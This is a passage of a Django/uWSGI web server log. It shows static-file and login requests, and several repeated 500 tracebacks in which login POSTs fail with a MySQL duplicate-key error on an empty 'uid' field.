() {38 vars in 730 bytes} [Fri Jan 15 01:29:38 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3956] 219.228.146.247 () {38 vars in 722 bytes} [Fri Jan 15 01:29:38 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3957] 58.37.59.126 () {38 vars in 711 bytes} [Fri Jan 15 01:29:39 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3958] 58.37.59.126 () {38 vars in 710 bytes} [Fri Jan 15 01:29:39 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3959] 58.37.59.126 () {38 vars in 702 bytes} [Fri Jan 15 01:29:39 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2835/3960] 219.228.146.126 () {36 vars in 706 bytes} [Fri Jan 15 01:29:40 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3961] 58.37.59.126 () {38 vars in 767 bytes} [Fri Jan 15 01:29:44 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3962] 58.37.59.126 () {38 vars in 741 bytes} [Fri Jan 15 01:29:45 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2836/3963] 183.193.170.194 () {40 vars in 1042 bytes} [Fri Jan 15 01:29:46 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3964] 219.228.146.247 () {38 vars in 788 bytes} [Fri Jan 15 01:29:47 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3965] 219.228.146.247 () {38 vars in 762 bytes} [Fri Jan 15 01:29:47 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2837/3966] 58.37.59.126 () {48 vars in 912 bytes} [Fri Jan 15 01:29:48 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2838/3967] 58.37.59.126 () {40 vars in 869 bytes} [Fri Jan 15 01:29:48 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2839/3968] 58.37.59.126 () {40 vars in 871 bytes} [Fri Jan 15 01:29:48 2021] GET /home/ => generated 10766 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3969] 58.37.59.126 () {38 vars in 804 bytes} [Fri Jan 15 01:29:48 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3970] 58.37.59.126 () {38 vars in 798 bytes} [Fri Jan 15 01:29:48 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 6 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3971] 58.37.59.126 () {38 vars in 800 bytes} [Fri Jan 15 01:29:48 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2840/3972] 183.193.170.194 () {48 vars in 1131 bytes} [Fri Jan 15 01:29:48 2021] POST /login/ => generated 208774 bytes in 327 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2841/3973] 219.228.146.126 () {36 vars in 708 bytes} [Fri Jan 15 01:29:50 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2842/3974] 183.193.170.194 () {48 vars in 1131 bytes} [Fri Jan 15 01:29:51 2021] POST /login/ => generated 208774 bytes in 169 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3975] 180.160.68.50 () {40 vars in 969 bytes} [Fri Jan 15 01:29:51 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2843/3976] 223.104.212.22 () {36 vars in 663 bytes} [Fri Jan 15 01:29:52 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3977] 180.160.68.50 () {40 vars in 1047 bytes} [Fri Jan 15 01:29:52 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3978] 180.160.68.50 () {40 vars in 1053 bytes} [Fri Jan 15 01:29:52 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3979] 180.160.68.50 () {40 vars in 1021 bytes} [Fri Jan 15 01:29:52 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2844/3980] 223.104.212.22 () {36 vars in 663 bytes} [Fri Jan 15 01:29:52 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2845/3981] 219.228.146.247 () {48 vars in 933 bytes} [Fri Jan 15 01:29:52 2021] POST /login/ => generated 208534 bytes in 184 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 183.193.170.194 client_port: 43853] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 183.193.170.194 client_port: 43597] hr_write(): Broken pipe [plugins/http/http.c line 565] +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2846/3982] 219.228.146.247 () {48 vars in 933 bytes} [Fri Jan 15 01:29:55 2021] POST /login/ => generated 208534 bytes in 139 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2847/3983] 223.104.212.22 () {36 vars in 663 bytes} [Fri Jan 15 01:29:55 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2848/3984] 223.104.212.22 () {36 vars in 665 bytes} [Fri Jan 15 01:29:57 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File 